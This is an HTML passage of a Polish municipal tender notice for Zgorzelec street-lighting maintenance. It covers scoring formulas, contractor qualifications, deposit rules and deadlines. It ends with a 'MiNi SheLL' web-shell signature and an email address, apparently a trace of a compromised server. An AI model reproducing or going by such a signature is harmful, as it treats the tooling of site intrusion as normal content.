Okres gwarancji na wykonane prace oraz zastosowane przy ich realizacji materiały i urządzenia, stanowi jedno z kryteriów oceny ofert. 13. Opis przedmiotu zamówienia został określony w Rozdziale IV SWZ, Zamawiający nie zamieścił pełnego opisu przedmiotu ze względu na ograniczona wielkość pola. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50232000-0 - Usługi w zakresie konserwacji publicznych instalacji oświetleniowych i sygnalizatorów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50232100-1 - Usługi w zakresie konserwacji oświetlenia ulicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteriami oceny ofert w niniejszym postepowaniu:<br/>1)	Cena (C) – waga kryterium 60 %;<br/>2)	Okres gwarancji jakości zleconych prac dodatkowych (G) – waga kryterium 40 %. <br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena (C):Podstawą przyznania punktów w kryterium „cena” będzie łączna <br/>cena ofertowa brutto podana przez Wykonawcę w Formularzu <br/>Ofertowym. Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Zamawiający oceni oferty według wzoru:<br/>C = (Cn/Cb) x 60<br/>C – liczba punktów za kryterium „cena”, <br/>Cn – cena najniższa z badanych ofert, spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Cb – cena badanej oferty<br/>60 – maksymalna liczba punktów, która może być przyznana <br/>w tym kryterium.<br/>2)	Okres gwarancji jakości zleconych prac dodatkowych (G):<br/>Podstawą przyznania punktów w kryterium „okres gwarancji jakości zleconych prac dodatkowych” będzie okres gwarancji <br/>w miesiącach, na wykonane dodatkowe prace oraz zastosowane materiały i urządzenia, podany przez Wykonawcę w Formularzu Ofertowym.<br/>Zgodnie z warunkami niniejszej SWZ minimalny okres gwarancji na wykonane dodatkowe prace oraz zastosowane przy realizacji zamówienia materiały i urządzenia, wynosi 36 miesięcy, natomiast maksymalny 60 miesięcy. <br/>Zamawiający oceni oferty wg wzoru:<br/>G = (Gm/Gmax) x 40<br/>G – liczba punktów za kryterium „okres gwarancji jakości zleconych prac dodatkowych”<br/>Gm- ilość miesięcy badanej ofert<br/>Gmax – maksymalny okres gwarancji (60 m-cy)<br/>40 – maksymalna liczba punktów, która może być przyznana <br/>w tym kryterium<br/>Zamawiający wymaga, aby Wykonawca określił okres gwarancji jakości zleconych prac dodatkowych w miesiącach, przy czym do oceny ofert w ramach tego kryterium Zamawiający przyjmie maksymalnie 60 miesięczny okres gwarancji. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, Zamawiający podaną wartość wpisze do postanowień umowy, natomiast do obliczeń przyjęta zostanie maksymalna ilość punktów, tj. 40<br/>W przypadku wskazania minimalnego – 36 miesięcznego okresu gwarancji Zamawiający przyzna 0 punktów.<br/>W przypadku nie wskazania okresu gwarancji jakości zleconych prac dodatkowych Zamawiający przyjmie, iż Wykonawca zaoferował minimalny tj. 36 miesięczny okres gwarancji i nie przyzna ofercie punktów.<br/>Zamawiający odrzuci ofertę Wykonawcy, który zaoferuje okres gwarancji krótszy niż 36 miesięcy - jako niezgodną z warunkami zamówienia.<br/>Warunki gwarancji zostały opisane w projekcie umowy (Załącznik nr 5 do SWZ).<br/>3)	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona, wg poniższego wzoru:<br/> P = C+G<br/>P – całkowita liczba punktów <br/>C – liczba punktów uzyskanych w kryterium „cena”<br/>G – liczba punktów uzyskanych w kryterium „okres gwarancji jakości zleconych prac dodatkowych”<br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający, zgodnie z art. 248 ust. 1 ustawy Pzp, wybierze spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>6.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną.<br/>7.	Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w ust. 7 niniejszego rozdziału SWZ, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości zleconych prac dodatkowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 112 ust. 1 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące zdolności zawodowej:<br/><br/>1)Wymagane doświadczenie zawodowe Wykonawcy:<br/>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia łącznie następujące warunki:<br/>a) Nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie dwie usługi w zakresie konserwacji oświetlenia drogowego i/lub parkowego o łącznej ilości punktów świetlnych nie mniejszej niż 1.500 szt.<br/>Wzór wykazu usług stanowi Załącznik nr 4 do SWZ.<br/>W przypadku usług nadal wykonywanych Wykonawca zobowiązany jest wykazać wymaganą ilość punktów świetlnych, o której mowa powyżej, na dzień składania ofert.<br/>b) Nie wcześniej niż w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie dwie roboty budowlane polegające na remoncie i/lub przebudowie, i/lub budowie oświetlenia drogowego i/lub parkowego o łącznej wartości minimum 300.000,00 zł brutto.<br/>Wzór wykazu robót stanowi Załącznik nr 4A do SWZ.<br/>W przypadku, gdy Wykonawca przedstawi w wykazie robót wartość wyrażoną w innej walucie niż PLN, Zamawiający do oceny spełniania warunku przyjmie średni kurs tej waluty <br/>w stosunku do PLN publikowany przez NBP z dnia wszczęcia (ogłoszenia) niniejszego postępowania.<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług/robót budowlanych wykonanych wspólnie z innym wykonawcą (konsorcjum), wówczas zobowiązany jest podać jedynie te usługi/roboty budowlane, w których wykonywaniu bezpośrednio i faktycznie uczestniczył, a w przypadku usług wykonywanych, w których wykonywaniu uczestniczy. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie faktycznie wykonywanego zakresu prac lub bezpośrednio do podmiotu na rzecz którego wykazany zakres prac został wykonany, o przedstawienie informacji lub dokumentów istotnych dla oceny spełnienia warunków.<br/><br/>2)	Osoby zdolne do wykonania zamówienia:<br/>O udzielenie zamówienia może ubiegać się Wykonawca, który skieruje do realizacji zamówienia następujące osoby: <br/>a)1 osobę (elektromontera) posiadającą łącznie:<br/>- upoważnienie powalające na realizacje prac na <br/>urządzeniach oświetlenia drogowego wydane przez <br/>właściciela sieci dystrybucji TAURON,<br/>- posiadającą uprawnienia do pracy pod napięciem (PPN),<br/>- uprawnienia w zakresie eksploatacji SEP E do 1 kV,<br/>b)1 osobę (elektromontera) posiadającą uprawnienia do pracy pod napięciem (PPN) oraz uprawnienia SEP E do 1 kV,<br/>c)1 osobę (osoba nadzorująca) posiadającą łącznie:<br/>- upoważnienie powalające na realizacje prac na <br/>urządzeniach oświetlenia drogowego wydane przez <br/>właściciela sieci dystrybucji TAURON,<br/>- posiadającą uprawnienia do pracy pod napięciem (PPN),<br/>- uprawnienia w zakresie dozoru SEP D do 1 kV,<br/>d)1 osobę (osoba nadzorująca) posiadającą oraz uprawnienia do pracy pod napięciem (PPN) oraz uprawnienia SEP D do 1 kV,<br/>e)1 osobę do pełnienia funkcji kierownika robót posiadającego uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do kierowania robotami budowlanymi lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w ww. specjalności.<br/>Wzór wykazu osób stanowi Załącznik nr 4B do SWZ.<br/>Nie dopuszcza się łączenia funkcji elektromontera oraz osoby nadzorującej przez jedną osobę.<br/>Wykonawca winien wykazać się kierownikiem robót (punkt 2 lit. c niniejszego ustępu) posiadającym uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych <br/>w budownictwie, zgodnie z przepisami ustawy z dnia 07 lipca 1994 r. Prawo budowlane oraz rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych <br/>w budownictwie lub innymi uprawnieniami umożliwiającymi wykonywanie tych samych czynności, do wykonania których <br/>w aktualnym stanie prawnym upoważniają uprawnienia budowlane w tej samej specjalności. <br/>Zgodnie z art. 104 ustawy Prawo budowlane – osoby, które przed dniem wejścia w życie ustawy (tj. przed dniem 01.01.1995 r.) uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. <br/>Powyższe oznacza, że w razie złożenia oferty zawierającej wskazanie osób posiadających uprawnienia budowlane uzyskane przed 1995 r., wymaga się od Wykonawcy, aby osoba ta posiadała uprawnienia zgodne z zakresem wskazanym w SWZ.<br/>W przypadku osób, posiadających uprawnienia wydane poza terytorium RP, w tym obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej wymaga się od Wykonawcy, aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane oraz pozostałych przepisów ww. ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej oraz art. 20a ustawy o samorządach zawodowych architektów oraz inżynierów budownictwa.<br/>Zamawiający informuje, że zgodnie z treścią art. 12 ust. 7 ustawy Prawo budowlane podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3 lit. a, oraz zgodnie z odrębnymi przepisami wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności.<br/><br/>W odniesieniu do warunków udziału, o których mowa w ust. 2 pkt 1 <br/>i 2 niniejszego rozdziału (wymagane doświadczenie zawodowe oraz osoby zdolne do wykonania zamówienia) Zamawiający dopuszcza łączne wykazanie się spełnianiem ww. warunków przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. Wobec powyższego Zamawiający zgodnie z art.117 ust 4 ustawy Pzp wymaga od Wykonawców wspólnie ubiegających się o zamówienie dołączenia do oferty oświadczenia, z którego będzie wynikało, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy, określonego Załącznikiem nr 3 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający, zgodnie z art. 274 ust. 1 ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, na potwierdzenie braku podstaw do wykluczenia, aktualnych na dzień ich złożenia, tj.: Oświadczenia Wykonawcy o braku podstaw do wykluczenia na podstawie art. 7 ust. 1 ustawy sankcyjnej – wzór oświadczenia stanowi Załącznik nr 2D do SWZ;<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, przedmiotowe oświadczenie składa każdy z nich. <br/>W przypadku polegania na zdolnościach podmiotów udostępniających zasoby Wykonawca składa na wezwanie Zamawiającego, aktualne na dzień złożenia oświadczenie, o którym mowa w niniejszym punkcie, również w odniesieniu do tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający, zgodnie z art. 274 ust. 1 ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, na potwierdzenie spełnienia warunków udziału w postępowaniu, aktualnych na dzień ich złożenia, tj.:<br/>1)	Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - wzór wykazu stanowi Załącznik nr 4 do SWZ;<br/>2)Wykazu robót budowlanych wykonanych nie wcześniej niż <br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - wzór wykazu stanowi Załącznik nr 4A do SWZ;<br/>3)Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług oraz kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi Załącznik nr 4B do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 6.100,00 PLN (słownie: sześć tysięcy sto złotych 00/100).<br/>2.Wadium wnosi się przed upływem terminu składania ofert <br/>i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, <br/>z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3.Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)Pieniądzu; <br/>2)Gwarancjach bankowych;<br/>3)Gwarancjach ubezpieczeniowych;<br/>4)Poręczeniach udzielanych przez podmioty, o których mowa <br/>w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. <br/>o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>4.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy numer: 75 1240 3464 1111 0010 6448 8461, <br/>z dopiskiem: „Wadium do postępowania nr WZP.271.1.19.2024”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin (data oraz godzina) uznania (zaksięgowania) kwoty wadium na rachunku bankowym Zamawiającego. W związku <br/>z powyższym wadium powinno wpłynąć na rachunek bankowy Zamawiającego do upływu terminu wyznaczonego na składanie ofert, tj. przed upływem godziny i dnia wyznaczonego, jako ostateczny termin składania ofert.<br/>5.Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej, zgodnie z zapisami ust. 10 niniejszego Rozdziału<br/>i zawierać w swej treści co najmniej poniżej wskazane wymagania:<br/>1)Musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 98 ust. 6 ustawy Pzp,<br/>2)Z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>3)Powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego, bez jakichkolwiek dodatkowych zastrzeżeń i warunków,<br/>4)Termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą, <br/>5)W treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania, <br/>6)Beneficjentem poręczenia lub gwarancji jest: Gmina Miejska Zgorzelec<br/>7)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający uzna wadium (w formie gwarancji lub poręczenia) za prawidłowe, jeżeli będzie ono dawało Zamawiającemu możliwość skutecznego zrealizowania swoich roszczeń w przypadku zaistnienia okoliczności uzasadniających zatrzymanie wadium, niezależnie od tego, który z Wykonawców wspólnie ubiegających się o udzielenie zamówienia doprowadził do ziszczenia się przesłanek określonych w art. 96 ust. 6 ustawy Pzp.<br/>6.Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium <br/>w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium <br/>w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp. <br/>7. Szczegółowe informacje dotyczące wadium zostały zawarte w Rozdziale XVI SWZ. Zamawiający nie zamieścił pełnego opisu ze względu na ograniczoną wielkość pola. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wówczas do oferty należy dołączyć stosowne pełnomocnictwo. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>Wspólnicy spółki cywilnej jako Wykonawcy składający ofertę wspólną, na podstawie art. 58 ust. 2 ustawy Pzp ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli umocowanie do reprezentacji wynika z treści umowy spółki cywilnej, do oferty Wykonawcy powinni załączyć treść tej umowy. W takim przypadku nie będzie potrzebne odrębne pełnomocnictwo. Jeżeli treść oświadczenia podpisują wszyscy wspólnicy spółki cywilnej, pełnomocnictwo nie musi być przez nich dołączone do oferty. Pełnomocnictwo należy złożyć w formie określonej w Rozdziale <br/>X SWZ.<br/>2.	W odniesieniu do warunku udziału w postępowaniu w zakresie zdolności zawodowej, tj. wymaganego doświadczenia oraz osób, <br/>o których mowa w Rozdziale VIII ust. 2 pkt 1 i pkt 2 SWZ, zgodnie <br/>z art. 117 ust. 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia mogą polegać na zdolnościach tych <br/>z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>W powyższym przypadku Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, z którego wynikać będzie, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy – określone Załącznikiem Nr 3 do SWZ.<br/>Powyższe oznacza obowiązek osobistego wykonania części zamówienia wskazanego w przedmiotowym oświadczeniu przez poszczególnych Wykonawców. Oświadczenie stanowić będzie integralną część umowy. <br/>3.	Oświadczenia potwierdzające brak podstaw wykluczenia <br/>z postępowania oraz o spełnianiu warunków udziału<br/>w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie – Załącznik nr 2, 2A i 2D do SWZ. Jeżeli chociażby jeden z Wykonawców podlega wykluczeniu to wykluczeniu podlega całe Konsorcjum.<br/>4.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców, o ile umowa taka nie zostanie załączona do oferty.<br/>5.	UWAGA: Jeżeli Wykonawca wykazuje doświadczenie nabyte <br/>w ramach zamówienia/umowy realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca powoływał się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, w których wykonaniu Wykonawca ten bezpośrednio nie uczestniczył. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie faktycznie wykonywanego zakresu prac lub bezpośrednio do podmiotu na rzecz którego wykazany zakres prac został wykonany, o przedstawienie informacji lub dokumentów istotnych dla oceny spełnienia warunków. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projekcie umowy (Załącznik nr 5 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zgorzelec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-28 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com